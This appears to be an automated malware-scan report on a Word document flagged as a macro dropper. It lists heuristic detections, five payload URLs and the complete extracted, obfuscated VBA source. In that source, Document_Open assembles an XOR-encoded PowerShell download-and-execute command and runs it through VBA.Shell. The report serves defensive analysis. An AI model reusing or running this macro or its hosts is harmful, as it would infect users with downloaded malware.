MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6594027-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6594027-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
wVdbO = JvQYS oMHOpA = EQNXzjqBwG + VBA.Shell(iXJYzluzR + Chr(vGJYnhHB + vbKeyP + uVwbTrIzQq) + "owers" + ICdDQFcRVvG + JmoKJGj + VDLoI + YNfjaGnFBMi + KfJwqAuj + jPdHLMUGmUZ + hjWIKajoIU, 78768 - 78768) ShHUV = OvwLk - SWpwr / 55495 / pKiPP - 223327908 + Hex(nSwKm) * NlNYKL - Round(31197) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://finnessemedia.com/4Mf1XT9QsU/ Referenced by macro
- http://oilmotor.com.ua/9jrQva/Referenced by macro
- http://djkuhni.ru/eDxMzacfWB/Referenced by macro
- http://zlc-aa.org/dg8G4r7/Referenced by macro
- http://coronadotx.com/VG0BJc48/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16944 bytes |
SHA-256: 92e426fe8674ec1350beaf8315f28b3bdc345f3cc3c8433e2c9df257f8961a57 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
277 of 440 identifiers look randomly generated (e.g. 'jPdHLMUGmUZ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YAEWQUz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function oMHOpA()
On Error Resume Next
HobwT = SuAkMX - CFmdSE / 22051 / afqiJa - 223327908 + Hex(LzHlnv) * ztwJV - Round(69659)
nXXtf = Sqr(27240)
kdWld = 49296 + drHYv + (31247 * CDbl(NpmTz) - hRiVBQ / CSng(3270) - alUvc / Hex(CnOHd) + 29479 - 36566)
kifwpv = mwbuww
bRTBKZ = utJzz - zDwUk / 99446 / ifZCN - 223327908 + Hex(jPzUip) * SJiSl - Round(97161)
GXVarN = Sqr(36096)
JkQJQo = 68809 + cbkAj + (15511 * CDbl(jIjbhN) - aqmVu / CSng(50665) - fKkwm / Hex(IjzFvI) + 20246 - 88639)
NXQrXE = kubaCz
uWWVdt = RYWLM - ULzij / 86081 / lbkMaK - 223327908 + Hex(CCqEo) * BfrEF - Round(48458)
bYBMZ = Sqr(33162)
JNvrQ = 76216 + pHuZa + (18961 * CDbl(wqYdil) - fTiarR / CSng(26560) - vaOabD / Hex(NmCwZ) + 34845 - 40497)
cKBzL = XHTYFH
wHzdp = zJsVc - bRhcm / 20678 / OfSbOA - 223327908 + Hex(BLwLD) * GRDBo - Round(330)
ViFuJ = Sqr(83820)
joITmK = 92039 + pOPiS + (43778 * CDbl(KoTud) - jfQwJ / CSng(95521) - BIldX / Hex(HWsMF) + 89990 - 18120)
wVdbO = JvQYS
oMHOpA = EQNXzjqBwG + VBA.Shell(iXJYzluzR + Chr(vGJYnhHB + vbKeyP + uVwbTrIzQq) + "owers" + ICdDQFcRVvG + JmoKJGj + VDLoI + YNfjaGnFBMi + KfJwqAuj + jPdHLMUGmUZ + hjWIKajoIU, 78768 - 78768)
ShHUV = OvwLk - SWpwr / 55495 / pKiPP - 223327908 + Hex(nSwKm) * NlNYKL - Round(31197)
TZzcY = Sqr(52806)
cYjfi = 56284 + WoMjR + (55473 * CDbl(JNjnl) - uGSRkl / CSng(34214) - MWqrTl / Hex(sXVFWM) + 56779 - 37590)
AIMArc = iooGTk
jibEOL = FHwzw - ffRZo / 20142 / TPwhnt - 223327908 + Hex(NhCpIU) * wMiuBc - Round(55103)
wpFuwf = Sqr(98381)
HlwkSs = 8467 + oQkKVX + (47695 * CDbl(wfnbV) - jjZDmw / CSng(73037) - TjiqGz / Hex(nrTLZ) + 96423 - 86408)
mJaIL = TBdibH
End Function
Private Sub Document_open()
On Error Resume Next
UnAOFO = ZQbzf - aETdz / 77137 / BHpjP - 223327908 + Hex(wcXTW) * qpMzI - Round(24990)
VGUklr = Sqr(3762)
UQhuR = 40144 + BYFHrc + (9638 * CDbl(SminhK) - LTirE / CSng(16289) - sjhmI / Hex(hijdjs) + 53160 - 80423)
Ecwwp = KoVIV
PfSsVa = sHMJj - TdzjOE / 37827 / nXrwZ - 223327908 + Hex(MluWd) * WVcYGd - Round(51045)
sUrhw = Sqr(81428)
DwqNwR = 97344 + PjCzEl + (79883 * CDbl(NFKQWX) - zrXFFl / CSng(7134) - WMkIrz / Hex(ArOjAn) + 2105 - 34930)
QXDPRi = auBBG
oMHOpA
OhHQZN = EzBsb - urhFhb / 34793 / SIRzk - 223327908 + Hex(HZXkR) * WWbZc - Round(89751)
wTSuNz = Sqr(60387)
cIbwwP = 98523 + NpfAO + (96964 * CDbl(Yckdo) - LjNbsS / CSng(96477) - mElJh / Hex(TzKhLf) + 28237 - 27540)
VboiUh = OWHSsW
MtfkEr = vISphq - LfbXwO / 45670 / jGzbP - 223327908 + Hex(zrYdT) * VLPIn - Round(67768)
oOwSwj = Sqr(22896)
NivZq = 36763 + zNiZQa + (39469 * CDbl(XQHcm) - caEivK / CSng(44202) - foiEu / Hex(raCjJF) + 71050 - 55170)
pdOiWn = Eclpj
End Sub
Attribute VB_Name = "oAnvuIzC"
Function ICdDQFcRVvG()
On Error Resume Next
jltBU = flkuj
zQssI = HWiKfa - MvkTBo / 32900 / XiYHS - 223327908 + Hex(wGMNKr) * DXlhsu - Round(81270)
KjIIz = 79837 + ijOjN + (88445 * CDbl(UOZmi) - dCvAmT / CSng(60105) - IrBnda / Hex(fzNOw) + 35625 - 41678)
RBfHSj = Sqr(31880)
MvjDXuFpYhE = "HeLL INvOke-e" + "xpResSiON([S" + "TrInG]::jOIn" + "( ''" + ", ( ["
klmvuF = vnQrz
zYjml = ZSiQFt - Dqjii / 63171 / GHttVH - 223327908 + Hex(zmbKN) * pUTzr - Round(7609)
ZiTlp = 14079 + QSzVi + (20205 * CDbl(XwlJu) - UnwlMX / CSng(47182) - KYwSsd / Hex(pRwCmh) + 52054 - 34459)
RMkwiz = Sqr(3569)
bmiqTXOp = "chAr" + "[]] ( 43 ,90" + " , 1" + "03 ,100" + " ," + "123 , 103, " + "47 , 50 ," + " 47 "
XkERVY = OVDRAQ
UiVTud = CPTLHw - wuvMUD / 67243 / MEZVS - 223327908 + Hex(QuwpZ) * OfodPM - Round(87159)
ApfnQ = 58447 + ZfGFs + (44492 * CDbl(iXjni) - SWDcXz / CSng(36908) - djJKw / Hex(pfoKa) + 49161 - 43958)
EzLdBd = Sqr(61781)
MlwGhWm = ",97," + "10" + "6 ,120 ,34" + " ,96 , " + "109,101 ," + "106,108" + " , 123," + " 47," + "125 , 11"
uHOPAH = QioJd
qATSQ = bjEAZ - IOplDN / 9544 / iGHvwE - 223327908 + Hex(zdlkX) * wRfdwD - Round(97367)
uSRuZ = 21351 + mUWVhR + (64691 * CDbl(GSzIJ) - iEqKUK / CSng(11906) - MIjwO / Hex(MXjqB) + 26720 - 98949)
lshiai = Sqr(20206)
AIDSBCMEV = "0 , 97 " + ",107,96,98,52,4" + "3 , 66, 73 , 1" + "24,72 ,8" + "6,75, 47" + " ,50, 47 , 97,"
zlAoNR = CvfMd
pwPmQ = YwiZNr - izOXC / 58040 / CTpCV - 223327908 + Hex(ThVCt) * VWYQSz - Round(79677)
hktXUL = 89975 + GTPBwM + (92939 * CDbl(IGJGm) - UGHkmw / CSng(90083) - GYtNOh / Hex(FcrDSt) + 35345 - 71015)
RFasnZ = Sqr(5306)
uuIXUsOi = " 106" + ",12" + "0 , 34 ,9" + "6, 109 , 10" + "1, 1"
ICdDQFcRVvG = MvjDXuFpYhE + bmiqTXOp + MlwGhWm + AIDSBCMEV + uuIXUsOi
End Function
Function JmoKJGj()
On Error Resume Next
TFkUFt = iHLUlv
JmXmn = oGfRU - XumjHY / 82803 / TJWVfj - 223327908 + Hex(FvMwt) * jcwiPU - Round(81568)
UVIMRw = 31312 + djfjWl + (19646 * CDbl(wYMlwz) - VzcplZ / CSng(17852) - HlkBCI / Hex(itcbb) + 7425 - 78109)
WtYaP = Sqr(92489)
SnbdfXR = "06," + " 1" + "08 ,123, 47 ," + "92 ,118" + " ,124,"
mzKHEQ = kJQCYF
IXnDn = qvOZWV - iJpFd / 67880 / AmFhTj - 223327908 + Hex(niXhXw) * XGofob - Round(46563)
zPBHG = 81526 + LSSaNo + (34985 * CDbl(FrDAzh) - MNaPu / CSng(40088) - wwVfic / Hex(cIOAKb) + 58901 - 85341)
qcLwDY = Sqr(96248)
QlpnrEzJBt = " 123 " + ",106," + " 98,33, 65 , 1" + "06 ,123,33" + " , 88" + " , 1"
wBIXc = SWrap
Skhra = OjmDWi - KjQjf / 18583 / RdJdv - 223327908 + Hex(ktPwh) * FrNXAw - Round(492)
XVSFj = 14204 + CMqrwW + (12592 * CDbl(DAZpH) - wqEZw / CSng(7234) - UMfHiq / Hex(Bojwji) + 40853 - 83570)
KJAWz = Sqr(29091)
qWOHsv = "06, 109 ,7" + "6, 99 ," + " 102, 106, " + "97,123 ,52,"
aCJdI = rvatUq
nLALoU = jmIEAv - fEWVX / 32200 / iALii - 223327908 + Hex(ZGwfr) * sofou - Round(98543)
ADobEv = 42114 + URqWtc + (17204 * CDbl(MQhfno) - UfVIN / CSng(80082) - VbqoF / Hex(YvvDic) + 12069 - 71476)
GOKiw = Sqr(26022)
sJHHSf = " 43,92 , 120," + "107," + "99,121 ,47" + ",50,47 , 40," + "103, 123" + ",123," + " 127 "
ALQWX = pDbJn
tLqGjz = fBAVUY - iKzkTv / 60211 / Khila - 223327908 + Hex(ldQBVW) * wbJck - Round(68165)
awIJK = 79508 + KTWdoc + (25908 * CDbl(DaAQcW) - QJNin / CSng(54791) - wzwKSQ / Hex(kfUwR) + 78673 - 71006)
ictKMm = Sqr(54557)
tdktBzXS = ", 53 , " + "32, 32" + " , 105,102 ," + "97 , 9" + "7, 106, 124 " + ",124,106 ,98" + " , 106 ,107,1" + "02,110, 33 , 10" + "8 , 96"
zRTQFB = iNbTjw
FGHvE = zXqHu - JcCjRB / 48731 / nuvLP - 223327908 + Hex(cBUEr) * zVUUq - Round(42190)
AJXuYK = 88060 + jTzCd + (59790 * CDbl(nHiMqU) - OSjZnD / CSng(32132) - ipabwR / Hex(iLZvZh) + 98157 - 32685)
XTzZT = Sqr(71293)
JZQNZlHRQ = " ,98 ,32" + ",5" + "9 ,66 ," + " 1"
TMBFSm = HbVmh
lDpEvV = XiIjRU - wzFzw / 46461 / GqWvmW - 223327908 + Hex(Lcbism) * Plitna - Round(45511)
uOjLL = 92104 + ClzCmP + (49508 * CDbl(oHhqvU) - KlpcY / CSng(3200) - BjiWTa / Hex(oJJupi) + 66599 - 28700)
SCNZST = Sqr(76930)
ZFsjfjmS = "05,6" + "2,87 " + ", 91," + "54" + ",94 ," + "124 " + ", 90 ,32"
WwziC = NTTVP
sMJScj = uLAimN - XowwZj / 90302 / WWiLn - 223327908 + Hex(aYMvzz) * wDKJV - Round(15307)
fNSJJ = 97636 + LCjBY + (66673 * CDbl(hNbGLz) - vTXzI / CSng(38327) - zJIMc / Hex(FBSUjo) + 36016 - 23573)
pzYvX = Sqr(45417)
GccwUOk = " ,79 ,103 " + ",123," + " 123 " + ",127, " + "53 ,32,32" + " ,96, 102 , 9"
IjJjw = RIcww
pLuTi = BaoEWD - qaliW / 95278 / VPvif - 223327908 + Hex(bsmHd) * VuGDDm - Round(20163)
FlpnnR = 91601 + Unoio + (30233 * CDbl(blmnEY) - znMwM / CSng(48354) - RwOzG / Hex(iHQWsa) + 85666 - 7824)
uarim = Sqr(81985)
fBTsthjXaj = "9 , 98,96 ,1" + "23" + ",96 ,125,33,108" + " , 96, 98" + ", 33 ,122, 1" + "10 ," + " 32 , 54,101 ,"
JmoKJGj = SnbdfXR + QlpnrEzJBt + qWOHsv + sJHHSf + tdktBzXS + JZQNZlHRQ + ZFsjfjmS + GccwUOk + fBTsthjXaj
End Function
Function VDLoI()
On Error Resume Next
FqhoDp = fUpIM
IMzhHW = IpzwQk - jIliPD / 68294 / zRdSdh - 223327908 + Hex(GhXBao) * SQrVnf - Round(96959)
WBaPPn = 30247 + Inhaj + (64034 * CDbl(kWhvM) - OfiHa / CSng(80844) - wXwwR / Hex(zsjnnw) + 89915 - 56327)
CANTIt = Sqr(90380)
TPEHJlz = " 125 , 94 ,121" + ", 110, 32 " + ", 79,103" + ",123, 123," + "12" + "7 ,53 ,3" + "2, 32,10" + "7," + "101,100,122"
wMLKQ = iairO
kbKTTM = jbtaKI - FwdaGI / 78114 / mnfLB - 223327908 + Hex(FKzYL) * IjBGC - Round(45762)
PiDpt = 19850 + iQbPK + (6177 * CDbl(qVqtPE) - wVRGSQ / CSng(77129) - HsKLZ / Hex(kMBcd) + 31642 - 30340)
UzBHTP = Sqr(25276)
fzfit = ", 103, 97 ,102 " + ", 33 ,125, " + "122, 32,1" + "06" + " , 75 ,119" + ", 66,117," + "110 ,108, " + "105 ,88, 77 ,32" + ",79 ,103,"
SAkpFc = sCdsJE
XYCmYN = wqbjr - sHlbRE / 55711 / ZihNJ - 223327908 + Hex(rDFzZ) * ojDmHH - Round(9077)
ToWnHL = 35172 + QwBwka + (42060 * CDbl(XYihWR) - wZjPb / CSng(5264) - EPGcou / Hex(SvMIoj) + 77154 - 77081)
rLWFG = Sqr(40081)
mBFuqXOlYR = "123, 123 " + ", 127 " + ", 53,32 , 32," + " 117 , 99,1"
QRMAw = Okauo
Fjbbi = lzpVo - GpaPa / 40316 / QMXqhk - 223327908 + Hex(pSibn) * dCzaCj - Round(59528)
rFzqV = 47685 + uhski + (18990 * CDbl(wJDwT) - zGFHV / CSng(63462) - HEGdK / Hex(XrjlN) + 33676 - 67085)
KoXjiq = Sqr(76815)
ssiWPzLjIkr = "08, " + "34 " + ",110 , " + "110, 33,96, " + "125,104, 32,10"
Gkwrd = nUNHGN
uPXmN = Hqphk - NqtIKW / 87767 / PEzZJ - 223327908 + Hex(JspYK) * qrfFCA - Round(87369)
Xsipt = 81132 + MSROi + (94925 * CDbl(DpANqq) - KcazE / CSng(17644) - VEaUZm / Hex(KRkIt) + 32670 - 15281)
ThJjwj = Sqr(58590)
FpVRk = "7 " + ", 104 , 55,72" + " , 59,125, 56,3" + "2, 79 , 103 ," + " 123, 123 , " + "127,53 , 32 , " + "32, 108," + " 96"
JuSMjQ = coAVb
LzqrcE = FjuaKL - mlPcU / 3164 / maLTa - 223327908 + Hex(vCdsOF) * qlOsQl - Round(12075)
GzpSwc = 82200 + OARWq + (1400 * CDbl(KoFJd) - OUllst / CSng(92940) - EoCjEk / Hex(pnEXCn) + 90559 - 88337)
qpPDR = Sqr(98837)
jJZYj = ",125,96, " + "97,110 ,107," + "96, 123 , " + "119,33,108 , 96" + ", 98, 32 , 8" + "9 , 72 , 63" + ", 77, 6" + "9,108 ,59,55 ,"
VDLoI = TPEHJlz + fzfit + mBFuqXOlYR + ssiWPzLjIkr + FpVRk + jJZYj
End Function
Function YNfjaGnFBMi()
On Error Resume Next
nINkil = Dzawz
ONCqaE = qJUuDc - tzRGlo / 5064 / QaHQLv - 223327908 + Hex(ckoTB) * EFKrK - Round(5304)
ZWiYCT = 72591 + GBLFR + (46681 * CDbl(XXMjv) - wSzis / CSng(97418) - zdRSHA / Hex(OjUOS) + 39484 - 91998)
GCfQNC = Sqr(61609)
ROJSWJvDA = " 32, 4" + "0, 33 , 9" + "2 ,127 , 99,1" + "02 , 123 " + ", 39,"
FzasFW = hzHQr
GBYiaT = DwSDGi - zuhPi / 65314 / ThTEj - 223327908 + Hex(jzSjk) * iUZMcC - Round(16052)
RzbiJ = 85328 + njjFka + (62806 * CDbl(sGPblY) - SAPLpm / CSng(40608) - dXbblH / Hex(bhSRrY) + 26761 - 39425)
iqUps = Sqr(84482)
nLUzqRS = " 40 ," + "79 , 40" + " ," + " 3" + "8,52," + "43 ,64, 66, 98" + ", 9"
OTZUHm = fvmZNJ
rKlmM = cBDQA - fvswFU / 49579 / FaijM - 223327908 + Hex(zJHww) * wtjRPw - Round(84772)
mUEZuM = 34456 + flSUz + (77226 * CDbl(hEMWz) - AHzztI / CSng(3094) - jGXbB / Hex(EHDHwQ) + 20924 - 76215)
BnmKFN = Sqr(65149)
KKSNz = "7,127" + ", 122 , " + "47,50, " + "47 ," + " 43, 9"
bGsAK = HFuoEk
HQHJiu = AfPDbM - IkBzm / 39424 / dcQlvB - 223327908 + Hex(msBvM) * FlJbjt - Round(69313)
jIQcCZ = 85313 + StFTK + (3128 * CDbl(PbiJcX) - whhYY / CSng(24976) - OStMCR / Hex(PoNWzu) + 17322 - 24269)
jAmUqT = Sqr(12417)
iVbbPvQGJj = "0, 103,100" + " ,123 , " + "103 ," + "33 ,97 ,106," + "119," + "123,39 , 62,35" + ", 47,54 , 5" + "9,63,58,6" + "2 , 57, 3"
YNfjaGnFBMi = ROJSWJvDA + nLUzqRS + KKSNz + iVbbPvQGJj
End Function
Function KfJwqAuj()
On Error Resume Next
UfFla = rBTqj
XnBrVr = XSRXdO - toYbZ / 14526 / ZsFIb - 223327908 + Hex(OiIFLJ) * obYwFF - Round(75522)
IioqXn = 87762 + OnNIP + (27383 * CDbl(WaaTt) - QIwLAU / CSng(53535) - kYLOap / Hex(zSDtAf) + 15226 - 63466)
wWMWV = Sqr(52621)
tjMDwzJKGtN = "8,52, 43, 123 ," + "65 ,127,96 ,76" + " , 72," + " 47, 50,4" + "7, 43 ,106,9" + "7 , 121 ,5" + "3 , 123" + " ,106,98 ,12" + "7 ,47 ,36, 47"
aiHiSQ = hnvwT
NZczj = kzEjwG - qCwibX / 70809 / KJawDj - 223327908 + Hex(BTaLZi) * kmqbr - Round(94088)
zuwit = 24807 + tKMLU + (68289 * CDbl(RPaVT) - qzKzi / CSng(18381) - KwUJP / Hex(IqhcPM) + 86710 - 42042)
PVvKiC = Sqr(72373)
LvYjkHjikY = ",40 , 83," + "40,47,36 ," + " 47 ," + " 43, 64,66 " + ",98 ,97,127," + " 122 ,4" + "7, 36,47, 40 , " + "33 , 106 , 1" + "19 ,106 ," + "40 , 52 , 105,9"
LcuPqZ = zjHfA
TChXR = FZwwp - JQiwZ / 99087 / CmfYO - 223327908 + Hex(BnSUL) * LfLhBo - Round(24859)
CPCBdP = 91289 + kJnhRi + (34427 * CDbl(ozfnK) - hfjMJV / CSng(3030) - TfYBEV / Hex(ozcBfb) + 36570 - 13484)
YqBqrH = Sqr(693)
NFIuzpai = "6 , 125" + ", 106 , 110 ," + "108" + " ,103 ,"
hWbii = zYIMEQ
wDPlRP = khYnzj - qwZuMp / 10066 / zWQwoz - 223327908 + Hex(nCBGW) * qoTQV - Round(6202)
GzaniS = 96700 + cmFlA + (58811 * CDbl(zicIMc) - jKztl / CSng(48741) - fGPuDE / Hex(ktXVOG) + 8060 - 69131)
zdwXa = Sqr(48253)
RHAYWQSPrC = " 39 ,43" + ", 91 , 101 " + ", 99" + ", 127" + ",86 " + ", 95" + ", 47" + " ,102 ,97," + "47,"
opSHDj = hYcOk
wMLzq = cTwmf - zTRNON / 16671 / zZAEpW - 223327908 + Hex(wzkJva) * YfznE - Round(72018)
JFtVVb = 83090 + uWlqJ + (43485 * CDbl(IGdrlS) - IDJsHs / CSng(66553) - ZnWrJ / Hex(uzvuMS) + 88909 - 36396)
QuJHZS = Sqr(98023)
hDhKKw = "43,92 ,120 ,107" + ",99, 121,38 " + ", 116" + " , 123, 1" + "25,118 , 11" + "6 , 43 ," + "66 , 73," + " 124 ," + "72, 86 ,75 ,"
bNjOV = zcwtLJ
CmADL = QohZJT - iwNou / 33526 / wZFcQ - 223327908 + Hex(RMVjs) * UZvwJo - Round(78187)
ZYLGI = 39109 + iVOck + (44365 * CDbl(ulPbJX) - WMUpT / CSng(74389) - VBrzlJ / Hex(AUqikR) + 76846 - 11551)
DdwCCq = Sqr(63840)
XvFwzNEfFT = "33 , 75 ," + " 96,120 , " + "97 , 99 ,96 ," + " 110, 107," + " 7" + "3 ,102 , 99,10" + "6 ,39 ,43 ," + "91 , 101 ,99, " + "127 ,86 , 95 "
KfJwqAuj = tjMDwzJKGtN + LvYjkHjikY + NFIuzpai + RHAYWQSPrC + hDhKKw + XvFwzNEfFT
End Function
Function jPdHLMUGmUZ()
On Error Resume Next
ZqCsim = YflOHZ
OBlKOG = bIKhY - cwZosR / 64699 / zOkdj - 223327908 + Hex(BzrIC) * CGiTB - Round(82293)
UdjYm = 94926 + ESzjiz + (94828 * CDbl(zDzGow) - WNzdm / CSng(85000) - kVkELF / Hex(SkCrD) + 40471 - 44907)
LAmip = Sqr(60618)
vHPXtO = ",33,91 " + ", 96,92" + " ,123,125 , " + "102 "
wJtjV = ocPawl
QOFMFk = kzfHZ - zTsjRm / 35912 / lCddDZ - 223327908 + Hex(mjkCj) * Oohcqi - Round(38278)
zORnA = 63217 + oRiRBi + (43904 * CDbl(VNGmBH) - IEhPju / CSng(80300) - WsWfDn / Hex(vTULVj) + 60545 - 52301)
qaIGBU = Sqr(22530)
ETXQELLwU = ",97, 104 ,3" + "9 , 38 , 35 ,4" + "7 , 43 , " + "123 ,65 ,127 ," + " 96,76,72 , 3" + "8, 52, 92" + ", 123 " + ", 11" + "0 , 125 ,1"
WBXBzq = Pakht
IcufQ = WIwdu - GukEBB / 5473 / LmhYm - 223327908 + Hex(tnSwc) * Rnrst - Round(22998)
fMcjBL = 88392 + PuFssl + (59246 * CDbl(EbEwO) - AFbDi / CSng(99479) - JAUnr / Hex(bFsoWZ) + 54981 - 12567)
SJGFb = Sqr(9617)
aZzwihP = "23, 34,95 ," + " 125 , 96, 108 " + ", 106,12" + "4 , 1"
Pikqt = AzMhEF
tQVmcj = HcHzk - cLbXsq / 64731 / nWXpYj - 223327908 + Hex(ujvcY) * UZCMp - Round(87029)
ZzKWv = 41234 + ISjqCA + (43039 * CDbl(TDsLp) - mXawnt / CSng(72399) - hFNqY / Hex(RcVzYS) + 21370 - 95511)
uotJqj = Sqr(17580)
wwnSwPha = "24, 47, 43,123," + "65, 127 ," + "96 , 76 , 72," + " 52, " + "109 , " + "12"
pvKLNU = cSlzp
auspoO = nUAokk - OkPrsG / 38775 / RHGcoN - 223327908 + Hex(bwEpi) * DuHhB - Round(94513)
tFuwwE = 5676 + MsMXM + (26766 * CDbl(lYKCz) - FrMLcD / CSng(27974) - bwwmzW / Hex(fEPlq) + 59580 - 55874)
woAGK = Sqr(81917)
tDroDBaJc = "5,106 , 11" + "0, 100, 52" + ", 114," + " 108,110" + ",123 ,108 " + ",103 ,116, 12" + "0 ,125,102" + ",123, "
vkBus = kDlPR
MiFaa = jwfWb - qvEXwq / 89758 / khjoPj - 223327908 + Hex(zAnOv) * DHLbLi - Round(71934)
ZjdliL = 49162 + PtEkv + (5622 * CDbl(KqHJr) - CzjFM / CSng(69924) - dUphmF / Hex(qaJYV) + 52904 - 55381)
BjRwp = Sqr(71715)
tViQYPhb = "106 ,34,10" + "3 , 96" + ",124 , " + "123 ,47, 43 ,"
ddCuh = GzJTIu
jzlij = NXczaj - YCfJY / 23510 / llatuZ - 223327908 + Hex(nfzvd) * dnIPGf - Round(2582)
pfuRK = 88156 + iwsIj + (98803 * CDbl(otvmLJ) - GEhti / CSng(89571) - zrUFAp / Hex(cQKAl) + 30464 - 52937)
ktNizR = Sqr(9124)
UZdmPvPub = "80,33" + ", 74 , " + "119, 108 ,106" + " ," + "127, 12"
jPdHLMUGmUZ = vHPXtO + ETXQELLwU + aZzwihP + wwnSwPha + tDroDBaJc + tViQYPhb + UZdmPvPub
End Function
Function hjWIKajoIU()
On Error Resume Next
mYlps = MriYaF
Cihjnm = zduBj - UarJs / 70600 / QwDRG - 223327908 + Hex(zAfzf) * mdQXL - Round(3113)
cuXroJ = 13308 + rcEwo + (54282 * CDbl(uQDtKZ) - NoDCwH / CSng(92425) - bUXTBs / Hex(XSWucu) + 92353 - 65014)
EwcwRV = Sqr(64946)
wNzIKwOXIWW = "3 " + ",102, 96 ,97" + ",33,66, 106" + ", 124, 124, 110" + " ," + " 104, 106" + " ,52,114 , 114" + ")|foREAch{[chA" + "r] ( $_-bXoR " + "0x0"
fLuzAu = TjXknY
fPjzI = YuUka - aTHZVz / 85993 / ljCNJ - 223327908 + Hex(dQWHUi) * qjrpc - Round(81588)
KiFaQc = 54621 + KUiOvz + (92356 * CDbl(DjHJE) - VzCWI / CSng(84872) - cuLGV / Hex(wLwuYH) + 83179 - 3500)
UlzBXf = Sqr(38286)
LNNJZm = "f )})))"
hjWIKajoIU = wNzIKwOXIWW + LNNJZm
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.